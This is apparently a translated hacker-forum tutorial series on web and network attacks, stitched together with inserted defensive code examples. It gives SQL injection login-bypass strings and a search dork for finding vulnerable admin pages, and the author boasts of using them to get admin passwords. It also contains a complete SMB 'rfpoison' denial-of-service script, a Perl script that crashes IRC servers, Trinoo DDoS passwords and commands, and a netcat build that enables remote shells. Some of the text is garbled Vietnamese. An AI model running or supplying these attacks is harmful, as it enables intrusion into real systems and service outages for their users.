Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c

So far my tests of exploiting this flaw have not succeeded (no idea what I did wrong). Anyone who manages it, please post it for everyone. Linux flaws are rare these days (especially on Redhat); if anything new appears, the security vulnerabilities board will post it right away. Ask the board's moderators how to exploit them, especially LeonHart, who is diligent about answering. (Based on an article by brother Binhnx2000)

36.) About SQL Injection:
_ SQL Injection is one of the web hacking techniques becoming popular today. By injecting SQL query/command code into the input before it is handed to the web application, you can log in without a username and password, execute commands remotely, steal data and get root on the SQL server. The attack tool is any web browser, such as Internet Explorer, Netscape, Lynx, ...
_ You can find vulnerable websites by using search engines to look for pages that allow submitting data. Some websites pass parameters through hidden fields, so you must view the source to see them. For example, we can tell the following page submits data by looking at the code when we view its source:
CODE
<input type=hidden name=A value=C>
_ Test whether the website has this flaw by entering the following login and password:
- Login: hi' or 1=1-- Pass: hi' or 1=1--
If that doesn't work, try the following logins and passwords:
CODE
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
If it succeeds, you can log in without knowing the username and password. This flaw concerns Queries, so anyone who has studied databases can exploit it easily just by typing Query commands in the browser. If you want to study this flaw more thoroughly, look for the articles by the vicky group.

37.) An example of hacking a website through the admentor flaw (a form of SQL Injection):
_ First go to google.com and find admentor websites with the keyword allinurl:admentor.
_ Usually you get results like: http://www.someserver.com/admentor/admin/admi%20n.asp
_ Try entering ' or ''=' as login and password:
CODE
Login: ' or ''='
Password: ' or ''='

_ If it succeeds you enter the vulnerable site as admin.
_ Let's look at how to fix this flaw:
+ Filter special characters such as ' " ~ \ by inserting the following javascript code:
CODE
function RemoveBad(strTemp) {
    strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g, "");
    return strTemp;
}
+ And call it from inside the asp script:
CODE
var login = RemoveBad(Request.QueryString("login"));
var password = RemoveBad(Request.QueryString("password"));

- That fixes the flaw.
- You can apply this hack to other websites that submit data; go and test them, Vietnamese websites have a lot of these, I have found quite a few admin passwords this way (but also told them to fix it).
- Many sites cannot be logged into with ' or ''= but only with real nicknames registered on the site; go to the members link, find an admin's nick and test with it. Happy hacking.

In part 6 I will cover the denial of service attack (DoS attack), a dangerous attack that can make even a strong website like our HVA choke in a short time, while the admins are all out for coffee and nobody is watching. Along with it, the DoS attack methods that have been and are being used. GOOD LUCK!!!!!!!!!!!!!!!!!!!!

The most basic things to know to become a Hacker - Part 6 [12/22/2004 10:04:00 AM]

38.) What is a DoS attack? (Denial Of Services Attack) A DoS attack (translated as denial of service attack) is a very dangerous kind of attack; with it, you only need one computer connected to the Internet to attack the opponent's computer. The essence of a DoS attack is that the hacker occupies a large amount of resources on the server (bandwidth, memory, cpu, disk, ...) so that the server cannot serve the requests from other people's machines (ordinary users), and the server can quickly stop working, crash or reboot.

39.) The kinds of DoS attack currently known and used:
a.) Winnuke:
_ This kind of DoS attack only applies to computers running Windows9x. The hacker sends packets with "Out of Band" data to port 139 of the target computer. (Port 139 is the NetBIOS port, which accepts only packets with the Out of Band flag set.) When the victim's computer receives the packet, a blue error screen is shown to the victim, because the Windows program receiving these packets doesn't know how to react to Out Of Band data, and the system crashes.
b.) Ping of Death:
_ In this kind of DoS attack, we only need to send one large packet via the ping command to the target machine and their system hangs.
_ Example: ping -l 65000
c.) Teardrop:
_ As we know, all data transferred over the network from the source system to the destination system goes through two steps: the data is split into small fragments at the source system, and each fragment is given an offset value that determines its position in the transferred data. When these fragments arrive at the destination, the destination system uses the offset values to reassemble them in the original order. Exploiting this, we only need to send the destination a series of packets whose offset values overlap each other. The destination system cannot rearrange these packets, loses control and can crash, reboot or stop working if the number of packets with overlapping offsets is large enough!
d.) SYN Attack:
_ In a SYN Attack, the hacker sends the target system a series of SYN packets with a bogus source ip address. The target system, on receiving these SYN packets, replies to the bogus addresses and waits for a response from the fake ip addresses. Since these ip addresses are bogus, the target waits and waits, and must keep these pending "requests" in memory, wasting a considerable amount of memory on the server that should be used for other things instead of waiting for replies that never come. If we send many such packets with fake IP addresses at once, the system is overloaded and crashes or reboots. ==> without lifting a finger.
e.) Land Attack:
_ A Land Attack is similar to a SYN Attack, but instead of bogus ip addresses the hacker uses the ip address of the victim system itself. This creates an infinite loop inside the victim system, between one side needing a reply and the other never able to send one. ==> a hornet's nest.
f.) Smurf Attack:
_ A Smurf Attack has three parts: the hacker (who orders the attack), the amplifier network (which does the hacker's bidding) and the victim system. The hacker sends ICMP packets to the broadcast address of the amplifier network. The special thing is that these ICMP packets carry the victim's ip address as their source. When the packets reach the amplifier network's broadcast address, the computers in the amplifier network think the victim sent them the ICMP packets and all reply to the victim with ICMP reply packets. The victim cannot handle the huge volume of these packets and quickly stops working, crashes or reboots. So, by sending a small number of ICMP packets, the amplifier network multiplies that number many times over. The amplification ratio depends on the number of computers in the amplifier network. The hacker's job is to take over as many networks or routers as possible that allow packets to be forwarded directly to the broadcast address without filtering the source address at the outbound interfaces. With these systems, the hacker can easily run a Smurf Attack on the systems he wants to attack. ==> one machine makes them all boil; let's see who gives up first.
g.) UDP Flooding:
_ The UDP attack requires two systems to take part. The hacker makes his system enter a loop exchanging data over UDP, forging the packets' ip address as the loopback address (127.0.0.1), then sending the packets to the victim's UDP echo port (7). The victim replies to the messages as if sent by 127.0.0.1 (itself), and it ends up going round an infinite loop. However, many systems do not allow the loopback address, so the hacker forges the ip address of some computer on the victim's network and floods the victim with UDP. If you fail at this, your own machine gets it instead.
h.) DNS attack:
_ The hacker can plant a false entry in the victim's Domain Name Server that points to some website of the hacker's. When a client asks the DNS to resolve the hijacked name to an ip address, the DNS (whose temporary cache the hacker has altered) immediately returns the ip address the hacker pointed it at. The result is that instead of the website they wanted, the victims land on the website the hacker made. A really effective denial of service attack!
g.) Distributed DoS Attacks (DDoS):
_ DDoS requires at least a few hackers to take part.
First the hackers try to break into poorly secured computer networks and install the DDoS server program on those systems. Then the hackers agree on a time, use the DDoS client to connect to the DDoS servers, and simultaneously order the DDoS servers to launch the DDoS attack on the victim.
h.) DRDoS (The Distributed Reflection Denial of Service Attack):
_ This is perhaps the most dangerous kind of attack, and the quickest way to reboot the opponent's computer. It works much like DDoS, but instead of attacking with many computers, the attacker needs only one machine, attacking through the big servers around the world. Still using the method of forging the victim's IP address, the attacker sends packets to the strongest, fastest servers with the widest links, such as Yahoo etc., and those servers send reply packets to the victim's address. Receiving many packets at once through these big servers quickly saturates the victim's link and crashes or reboots the machine. This attack is dangerous because just one machine on a simple, ordinary Internet connection can knock down any system with the best link in the world if we don't stop it in time. Our HVA website was recently DoSed by this kind of attack.

40.) The technique of DoSing the web with Python:
_ This technique can only be used against WinNT, and you need time before the victim's computer goes down.
_ Download Python from http://www.python.org/ to use it.
_ Save the following code as the file rfpoison.py.
CODE
import string
import struct
from socket import *
import sys

def a2b(s):
    bytes = map(lambda x: string.atoi(x, 16), string.split(s))
    data = string.join(map(chr, bytes), '')
    return data

def b2a(s):
    bytes = map(lambda x: '%.2x' % x, map(ord, s))
    return string.join(bytes, ' ')

# NBSS session request
nbss_session = a2b("""
81 00 00 48 20 43 4b 46 44 45 4e 45 43 46 44 45 46 46 43 46 47 45 46 46
43 43 41 43 41 43 41 43 41 43 41 43 41 00 20 45 48 45 42 46 45 45 46 45
4c 45 46 45 46 46 41 45 46 46 43 43 41 43 41 43 41 43 41 43 41 41 41 00
00 00 00 00
""")

# SMB stuff
crud = (
# SMBnegprot request
"""
ff 53 4d 42 72 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 f4 01 00 00 01 00 00 81 00 02 50 43 20 4e 45 54 57 4f 52 4b 20 50
52 4f 47 52 41 4d 20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20 4e 45
54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d 49 43 52 4f 53 4f 46 54 20 4e
45 54 57 4f 52 4b 53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30 00 02
4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e
4d 41 4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00
""",
# SMB session setup X request
"""
ff 53 4d 42 73 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff ff 02 00 f4 01 00 00 00 00 01
00 00 00 00 00 00 00 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f 55 50
00 55 6e 69 78 00 53 61 6d 62 61 00
""",
# SMBtconX request
"""
ff 53 4d 42 75 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 f4 01 00 08 01 00 04 ff 00 00 00 00 00 01 00 17 00 00 5c 5c 2a 53
4d 42 53 45 52 56 45 52 5c 49 50 43 24 00 49 50 43 00
""",
# SMBntcreateX request
"""
ff 53 4d 42 a2 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00
00 08 f4 01 00 08 01 00 18 ff 00 00 00 00 07 00 06 00 00 00 00 00 00 00
9f 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 00 08 00 5c 73 72 76 73 76 63 00
""",
# SMBtrans request
"""
ff 53 4d 42 25 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00
00 08 f4 01 00 08 01 00 10 00 00 48 00 00 00 48 00 00 00 00 00 00 00 00
00 00 00 00 00 4c 00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 49 50 45
5c 00 00 00 05 00 0b 00 10 00 00 00 48 00 00 00 01 00 00 00 30 16 30 16
00 00 00 00 01 00 00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78 5a 47
bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60
02 00 00 00
""",
# SMBtrans Request
"""
ff 53 4d 42 25 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00
00 08 f4 01 00 08 01 00 10 00 00 58 00 00 00 58 00 00 00 00 00 00 00 00
00 00 00 00 00 4c 00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 49 50 45
5c 00 00 00 05 00 00 03 10 00 00 00 58 00 00 00 02 00 00 00 48 00 00 00
00 00 0f 00 01 00 00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00 5c 00
2a 00 53 00 4d 00 42 00 53 00 45 00 52 00 56 00 45 00 52 00 00 00 00 00
01 00 00 00 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00
"""
)
crud = map(a2b, crud)

def smb_send(sock, data, type=0, flags=0):
    d = struct.pack('!BBH', type, flags, len(data))
    #print 'send:', b2a(d+data)
    sock.send(d+data)

def smb_recv(sock):
    s = sock.recv(4)
    assert(len(s) == 4)
    type, flags, length = struct.unpack('!BBH', s)
    data = sock.recv(length)
    assert(len(data) == length)
    #print 'recv:', b2a(s+data)
    return type, flags, data

def nbss_send(sock, data):
    sock.send(data)

def nbss_recv(sock):
    s = sock.recv(4)
    assert(len(s) == 4)
    return s

def main(host, port=139):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(host, port)
    nbss_send(s, nbss_session)
    nbss_recv(s)
    for msg in crud[:-1]:
        smb_send(s, msg)
        smb_recv(s)
    smb_send(s, crud[-1])   # no response to this
    s.close()

if __name__ == '__main__':
    print 'Sending poison...',
    main(sys.argv[1])
    print 'done.'
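Returning to the Teardrop attack in section 39 c: this added example (not from the tutorial; addresses and payloads are constructed, function names are this example's own) builds IPv4 fragments with the real header layout, shows what a reassembler that trusts the offsets makes of an overlapping pair, and then the strict reassembly a receiver needs, which rejects overlaps and gaps:

```python
"""Added example (not from the tutorial): IPv4 fragments as used by the
Teardrop attack in section 39 c, a trusting reassembler, and a strict one.
Addresses and payloads are constructed."""
import struct

IP_MF = 0x2000        # "more fragments" bit in the flags/offset field
OFFSET_MASK = 0x1FFF  # 13-bit fragment offset, in units of 8 bytes


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 ones'-complement sum; returns 0 for a header that verifies."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_fragment(ident, offset8, more, payload, src="10.0.0.5", dst="10.0.0.9"):
    """Raw IPv4 fragment (protocol UDP, TTL 64) with a valid header checksum;
    offset8 is the fragment offset in 8-byte units."""
    flags_off = (IP_MF if more else 0) | (offset8 & OFFSET_MASK)
    src_b = bytes(int(x) for x in src.split("."))
    dst_b = bytes(int(x) for x in dst.split("."))
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident,
                      flags_off, 64, 17, 0, src_b, dst_b)
    hdr = hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]
    return hdr + payload


def parse_fragment(packet: bytes):
    """Return (ident, byte offset, more, payload); raise on a bad header."""
    if len(packet) < 20:
        raise ValueError("short packet")
    ver_ihl, _tos, total_len, ident, flags_off = struct.unpack("!BBHHH", packet[:8])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or ihl > total_len or total_len > len(packet):
        raise ValueError("malformed header")
    if ipv4_checksum(packet[:ihl]) != 0:
        raise ValueError("bad header checksum")
    return ident, (flags_off & OFFSET_MASK) * 8, bool(flags_off & IP_MF), packet[ihl:total_len]


def naive_reassemble(fragments) -> bytes:
    """A trusting reassembler: size the buffer from the last fragment and
    copy each payload to its claimed offset.  Overlaps silently overwrite
    data; the Linux reassembly code of 1997 turned such an overlap into a
    negative copy length, which was the crash."""
    pieces = [parse_fragment(p) for p in fragments]
    last = max(pieces, key=lambda p: p[1])
    buf = bytearray(last[1] + len(last[3]))
    for _ident, offset, _more, payload in pieces:
        buf[offset:offset + len(payload)] = payload
    return bytes(buf)


def reassemble(fragments) -> bytes:
    """Strict reassembly: one datagram, exactly one final fragment, no gaps,
    no overlaps, non-final fragments a multiple of 8 bytes."""
    pieces = sorted(parse_fragment(p) for p in fragments)
    if any(p[0] != pieces[0][0] for p in pieces):
        raise ValueError("fragments belong to different datagrams")
    if sum(1 for p in pieces if not p[2]) != 1 or pieces[-1][2]:
        raise ValueError("final fragment missing, duplicated or not last")
    data, expected = b"", 0
    for _ident, offset, more, payload in pieces:
        if offset < expected:
            raise ValueError("overlapping fragment at offset %d" % offset)
        if offset > expected:
            raise ValueError("gap before offset %d" % offset)
        if more and len(payload) % 8:
            raise ValueError("non-final fragment is not a multiple of 8 bytes")
        data += payload
        expected += len(payload)
    return data


def check(fragments) -> str:
    """'ok' or the strict reassembler's rejection reason."""
    try:
        reassemble(fragments)
        return "ok"
    except ValueError as exc:
        return str(exc)


# Constructed datagrams: a well-formed one, and a Teardrop-style pair whose
# second fragment claims an offset inside the first.
GOOD = [build_fragment(7, 0, True, b"A" * 16),
        build_fragment(7, 2, True, b"B" * 8),
        build_fragment(7, 3, False, b"C" * 5)]
TEARDROP = [build_fragment(8, 0, True, b"A" * 24),
            build_fragment(8, 1, False, b"B" * 8)]
```

Calling naive_reassemble(TEARDROP) returns 24 bytes of silently corrupted data, while check(TEARDROP) reports the overlapping fragment at offset 8.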

Bringing down the opponent's server with the rfpoison script takes time to DoS; if you can't afford to wait, it's best not to use this method. But trying it just to see is fine, right?

41.) DDoS attack via Trinoo:
_ You know what a DDoS attack is by now, right? A DDoS attack with Trinoo is carried out by the hacker connecting to a Trinoo Master and instructing the Master to launch a DDoS attack on one or more targets. The Trinoo Master contacts the Daemons, handing them the addresses to attack, one or more targets, for a specified length of time.
_ Both the Master and the Daemon are protected by passwords, so only someone who knows the password can control them, which is no problem if we are their real owner. These passwords are usually encrypted and can be set when compiling Trinoo from source to binary. When run, the Daemon shows a prompt and waits for a password; if the password is wrong it exits, and if it is correct it runs in the background of the system.
attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is '^]'.
kwijibo
Connection closed by foreign host.   <== you typed it wrong

attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
trinoo>   <== you are in the trinoo system
_ Here are a few default passwords:
"l44adsl": password of the trinoo daemon.
"gorave": password of the trinoo master server at startup.
"betaalmostdone": shared remote-control password for the trinoo master.
"killme": trinoo master password for controlling the "mdie" command.
_ Here are some commands for controlling the Master Server:

CODE die------------------------------------------------ ------------Shutdown. quit----------------------------------------------- -------------Log off. mtimer N-------------------------------------------------- --t thI gian tn cng DoS , vI N nhn gi tr t 1-- > 1999 giy . dos IP------------------------------------------------- ------Tn cng n mt a ch IP xc nh . mdie pass----------------------------------------------- ----V hiu ho tt c cc Broadcast , nu nh passwd chnh xc . Mt lnh c gi ti (``d1e l44adsl``) Broadcast Shutdown chng . Mt passwd ring bit s c t cho mc ny mping---------------------------------------------- ----------Gi mt lnh ping ti (``png l44adsl``) cc Broadcast. mdos ------------------------------------------Send nhiu lnh DOS (``xyz l44adsl 123:ip1:ip2``) n cc Broadcast. info----------------------------------------------- --------------Hin th thng tin v Trinoo . msize---------------------------------------------- ------------t kch thc m cho nhng gi tin c send i trong sut thI gian DoS. nslookup host----------------------------------------------X c nh tn thit b ca Host m Master Trinoo ang chy . usebackup------------------------------------------ ---------Chuyn tI cc file Broadcast sao lu c to bi lnh killdead. bcast---------------------------------------------- -------------Lit k danh sch tt c cc Broadcast c th khai thc . help [cmd] --------------------------------------------------- a ra danh sch cc lnh . mstop---------------------------------------------- -------------Ngng li cc cuc tn cng DOS .

_ y l mt s lnh dng iu khin Trinoo Deadmons: CODE aaa pass IP------------------------------------------------- ---Tn cng n a ch IP xc nh . GI gi tin UDP (0-65534) n cng ca UDP ca a ch IP xc nh trong mt khong thi gian xc nh c mc nh l 120s hay t 1-- > 1999 s . bbb pass N-------------------------------------------------- ---t thI gian gii hn cho cc cuc tn cng DOS . Shi pass----------------------------------------------- ---------Gi chui *HELLO* ti dnh sch Master Server c bin dch trong chng trnh trn cng 31335/UDP.

png pass----------------------------------------------- --------Send chui Pong tI Master Server pht hnh cc lnh iu khin trn cng 31335/UDP. die pass----------------------------------------------- ---------Shutdown Trinoo. rsz N-------------------------------------------------- ----------L kch thc ca b m c dng tn cng , n c tnh bng byte . xyz pass 123:ip1:ip3---------------------------------------- tn cng DOS nhiu mc tiu cng lc .
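The detection side of the exchange above, as an added example that is not part of the original post: given constructed packet records (not a real capture), it flags the control and beacon traffic this page documents (the attacker's connection to 27665/TCP on the master, "*HELLO*" and "PONG" beacons to 31335/UDP, and the "aaa", "xyz", ... commands to the daemons) and infers which hosts are the attacker, the master, the daemons and the targets. The daemon's own listener, 27444/UDP, is not named on this page; it comes from the public Trinoo analysis and is marked as an assumption in the code.

```python
import re

# Ports and strings named on this page:
MASTER_CTRL_PORT = 27665    # TCP: attacker telnets here and gives the remote-control password
MASTER_REPORT_PORT = 31335  # UDP: daemons send "*HELLO*" and "PONG" to the master here
# Assumption, not from this page: the daemon's own listener is 27444/UDP
# (taken from the public Trinoo analysis).
DAEMON_CMD_PORT = 27444

# Master -> daemon commands from the page's list: "aaa pass IP", "bbb pass N",
# "shi pass", "png pass", "d1e pass", "rsz N", "xyz pass 123:ip1:ip2".
DAEMON_CMD_RE = re.compile(rb'^(aaa|bbb|shi|png|d1e|rsz|xyz) \S+')
AAA_TARGET_RE = re.compile(rb'^aaa \S+ (\S+)')
XYZ_TARGETS_RE = re.compile(rb'^xyz \S+ \d+:(\S+)')

# Constructed sample records (not a real capture): one attacker, one master,
# one daemon, two targets, plus two benign packets.
SAMPLE_RECORDS = [
    {'src': '192.0.2.10', 'dst': '10.0.0.1', 'proto': 'tcp', 'dport': 27665,
     'payload': b'betaalmostdone\r\n'},
    {'src': '10.0.0.7', 'dst': '10.0.0.1', 'proto': 'udp', 'dport': 31335,
     'payload': b'*HELLO*'},
    {'src': '10.0.0.1', 'dst': '10.0.0.7', 'proto': 'udp', 'dport': 27444,
     'payload': b'aaa l44adsl 203.0.113.5'},
    {'src': '10.0.0.1', 'dst': '10.0.0.7', 'proto': 'udp', 'dport': 27444,
     'payload': b'xyz l44adsl 120:203.0.113.5:203.0.113.6'},
    {'src': '10.0.0.7', 'dst': '10.0.0.1', 'proto': 'udp', 'dport': 31335,
     'payload': b'PONG'},
    {'src': '10.0.0.9', 'dst': '10.0.0.1', 'proto': 'udp', 'dport': 53,
     'payload': b'\x12\x34\x01\x00'},                       # ordinary DNS query
    {'src': '10.0.0.9', 'dst': '10.0.0.1', 'proto': 'tcp', 'dport': 80,
     'payload': b'GET / HTTP/1.0\r\n\r\n'},                  # ordinary web request
]


def classify(rec):
    """Label one packet record, or return None when it does not look like Trinoo."""
    proto, dport, payload = rec['proto'], rec['dport'], rec['payload']
    if proto == 'tcp' and dport == MASTER_CTRL_PORT:
        # The port alone is weak evidence; the cleartext control password
        # ("betaalmostdone") in the first segment is what makes it convincing.
        return 'master-control'
    if (proto == 'udp' and dport == MASTER_REPORT_PORT
            and payload.strip() in (b'*HELLO*', b'PONG')):
        return 'daemon-beacon'
    if proto == 'udp' and dport == DAEMON_CMD_PORT and DAEMON_CMD_RE.match(payload):
        return 'daemon-command'
    return None


def summarize(records):
    """Infer the role of every address from the labelled records."""
    roles = {'attacker': set(), 'master': set(), 'daemon': set(), 'target': set()}
    for rec in records:
        kind = classify(rec)
        if kind == 'master-control':
            roles['attacker'].add(rec['src'])
            roles['master'].add(rec['dst'])
        elif kind == 'daemon-beacon':
            roles['daemon'].add(rec['src'])
            roles['master'].add(rec['dst'])
        elif kind == 'daemon-command':
            roles['master'].add(rec['src'])
            roles['daemon'].add(rec['dst'])
            m = AAA_TARGET_RE.match(rec['payload'])
            if m:
                roles['target'].add(m.group(1).decode('ascii'))
            m = XYZ_TARGETS_RE.match(rec['payload'])
            if m:
                roles['target'].update(m.group(1).decode('ascii').split(':'))
    return roles


if __name__ == '__main__':
    for name, hosts in summarize(SAMPLE_RECORDS).items():
        print(f'{name:9s} {sorted(hosts)}')
```

The beacon match is the most reliable of the three: a UDP datagram whose entire payload is "*HELLO*" or "PONG" aimed at 31335 has no legitimate explanation, whereas a bare TCP connection to 27665 can be any service someone chose to run there.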

(Based on brother Binhnx2000's guide.) There are many more code snippets and ways of applying DoS; take the trouble to look them up yourselves. But don't attack at random, least of all HVA's server: you will get nowhere and have your nick locked on top of it. End of part 6 - Anhdenday

The most basic knowledge to become a Hacker - Part 7 [12/22/2004 10:10:00 AM]

42.) DoS technique against the WircSrv IRC Server v5.07: WircSrv IRC is a popular IRC server on the Internet. It crashes if a hacker sends it a packet larger than the allowed size (65000 characters) on port 6667. You can do this by telnetting to WircSrv on port 6667:

If you use Unix:
[hellme@die-communitech.net$ telnet irc.example.com 6667
Trying example.com...
Connected to example.com.
Escape character is '^]'.
[buffer]

Windows is the same:
telnet irc.example.com 6667

Note: [buffer] stands for a data packet of 65000 characters. We can crash it much more simply, however, with the following code (look at the code and work out the commands in it yourself; that is one of the ways hackers train their reflexes when they study. Let's analyze it briefly):

CODE
#!/usr/bin/perl                          #<== this line says the script is run by the perl interpreter
use Getopt::Std;
use Socket;
getopts('s:', \%args);                   # -s <server> is the only option
if(!defined($args{s})){&usage;}
my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);
$foo = "A";                              # the filler byte (the original comment calls it a NOP; 0x41 is just padding here, nothing is executed)
$number = "65000";                       # how many filler bytes
$data .= $foo x $number;                 # $foo repeated $number times
$serv = $args{s};                        # the remote server
$port = 6667;                            # the remote port, 6667 by default
$buf = "$data";
$in_addr = (gethostbyname($serv))[4];    # resolve the server name to a packed IPv4 address
# The page's listing breaks off at the line above. The rest is reconstructed
# from the variables declared in the my() list, using the standard Socket calls:
$paddr = sockaddr_in($port, $in_addr);
$proto = getprotobyname('tcp');
socket(S, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(S, $paddr) or die "connect: $!";
send(S, $buf, 0);                        # one oversized message, no newline
close(S);

sub usage {
    print "usage: $0 -s <server>\n";
    exit;
}
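The defect the script above exploits, and its fix, as an added example that is neither from this page nor from WircSrv: a reader that collects bytes until CRLF with no upper bound keeps growing (or overflows a fixed buffer) when a client sends 65000 bytes and never a newline, while a reader that caps the pending line survives the same input. The 512-byte IRC message limit used as the default is an assumption taken from the IRC protocol specification, not from this page.

```python
# Assumption: an IRC message is at most 512 bytes including CRLF (RFC 1459).
IRC_MAX_LINE = 512


class LineTooLong(Exception):
    """Raised when a client sends more bytes than one message may hold without a CRLF."""


class NaiveLineReader:
    """Accumulates input until CRLF with no upper bound. A client that sends
    65000 bytes and never a newline makes this buffer grow without limit;
    the same logic over a fixed-size buffer overflows instead."""

    def __init__(self):
        self.pending = b''

    def feed(self, chunk):
        self.pending += chunk
        lines = []
        while b'\r\n' in self.pending:
            line, self.pending = self.pending.split(b'\r\n', 1)
            lines.append(line)
        return lines


class BoundedLineReader:
    """Same interface, but a message longer than max_line is rejected and the
    client's buffer dropped, so memory per connection stays at max_line plus
    the size of one recv() chunk the caller passes in."""

    def __init__(self, max_line=IRC_MAX_LINE):
        self.max_line = max_line
        self.pending = b''

    def feed(self, chunk):
        self.pending += chunk
        lines = []
        while True:
            nl = self.pending.find(b'\r\n')
            if nl == -1:
                break
            if nl + 2 > self.max_line:          # complete line, but too long
                self.pending = b''
                raise LineTooLong(nl + 2)
            lines.append(self.pending[:nl])
            self.pending = self.pending[nl + 2:]
        if len(self.pending) >= self.max_line:  # partial line that can never fit
            size = len(self.pending)
            self.pending = b''
            raise LineTooLong(size)
        return lines


def flood_payload(count=65000, byte=b'A'):
    """The same payload the Perl script builds: count copies of one byte, no newline."""
    return byte * count


def outcome(reader, payload):
    """Run payload through a reader and report what the server would observe."""
    try:
        lines = reader.feed(payload)
    except LineTooLong as e:
        return ('rejected', e.args[0])
    if reader.pending:
        return ('buffered', len(reader.pending))
    return ('ok', lines)


if __name__ == '__main__':
    print('naive  :', outcome(NaiveLineReader(), flood_payload()))
    print('bounded:', outcome(BoundedLineReader(), flood_payload()))
    print('normal :', outcome(BoundedLineReader(), b'NICK x\r\nUSER x 0 * :x\r\n'))
```

The bounded reader also rejects a complete line that is too long, not only a never-ending one, so a client cannot sidestep the limit by adding a CRLF after 65000 bytes.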

The most basic knowledge to become a Hacker - Part 8 [2/17/2005 9:14:00 AM]

47.) Tools needed for hacking the Web:
Professional hackers do not need these tools: they install, on their own machine, the same version of the software the victim site runs and test it there. For those just starting out, though, these tools are essential; use them a few times and you will learn how to combine them to find flaws on the victim sites as fast as possible. Here are some tools you should have on your working machine:

_ Tool 1: A proxy, to hide your IP and get past a firewall when needed (how to set up a proxy was shown in part 7; go back and read it).
_ Tool 2: A shell account; this really matters to you. A good shell account lets you run the main programs such as nslookup, host, dig, ping, traceroute, telnet, ssh, ftp, ... and it must have GCC installed (very important for compiling exploits written in C); on Windows, MinGW or Cygwin give you GCC and the other dev tools. A shell account is a bit like a DOS shell, but with far more commands and features than DOS. Usually, when you install Unix you get a shell account; if you do not install Unix, sign up for a free shell account online, or if someone has installed Unix and created a shell account for you, log in with telnet (Start -> Run -> type Telnet) to use it. Here are a few places where you can sign up for a free shell account:
http://www.freedomshell.com/
http://www.cyberspace.org/shell.html
http://www.ultrashell.net/
_ Tool 3: NMAP, a fast and powerful port scanner. It can scan large networks and is particularly good against a single host. NMAP shows you which services are running on the server (services / ports: webserver, ftpserver, pop3, ...), which operating system it runs, what kind of firewall it uses, and much more. NMAP supports most scanning techniques: ICMP (ping sweep), IP protocol, Null scan, TCP SYN (half open), ... NMAP is rated the number-one tool of hackers and network administrators worldwide. All information about NMAP is at http://www.insecure.org/.
_ Tool 4: Stealth HTTP Security Scanner, an excellent security scanner for Win32. It can check for over 13000 security holes and identify 5000 other exploits.
_ Tool 5: IntelliTamper shows the structure of a website, which directories and files it contains, and can even list directories and files that have a password set. Very handy for hacking a website, because before you hack a site you must know something about the admin and the site.
_ Tool 6: Netcat, a tool for reading and writing data across the network over TCP or UDP. You can use Netcat directly or drive it from another script. Netcat is regarded as an exploitation tool because it can set up a link between you and the server for reading and writing data (once Netcat is installed on a vulnerable server, of course). All information about Netcat is at http://www.l0pht.com/.
_ Tool 7: ActivePerl, for running Perl files with the *.pl extension; exploits are often written in Perl. It is also used to execute commands through *.pl files.
_ Tool 8: Linux, the operating system almost every hacker uses.
_ Tool 9: L0phtCrack, the number-one tool for cracking Windows NT/2000 passwords.
_ I have already shown how to download, so I will not repeat it here. When downloading, pay attention to the versions: take the one with the highest number, since it will have features the earlier versions lacked. If you download one and do not know how to use it, look for the guides already posted in the box. If you still cannot find any, post a question and the friends will answer you.

48.) Netcat guide:

a.) Introduction: Netcat is an indispensable tool if you want to hack a website; it is powerful and convenient, so you need to know a little about it.

b.) Compiling:
_ For the Linux version of Netcat you have to compile it before use.
- edit netcat.c with vi: vi netcat.c
+ find the line res_init(); in main() and put two slashes in front of it: // res_init();
+ add the following two lines to the #define block at the top of the file:

#define GAPING_SECURITY_HOLE
#define TELNET

- compile: make linux
- test it: ./nc -h
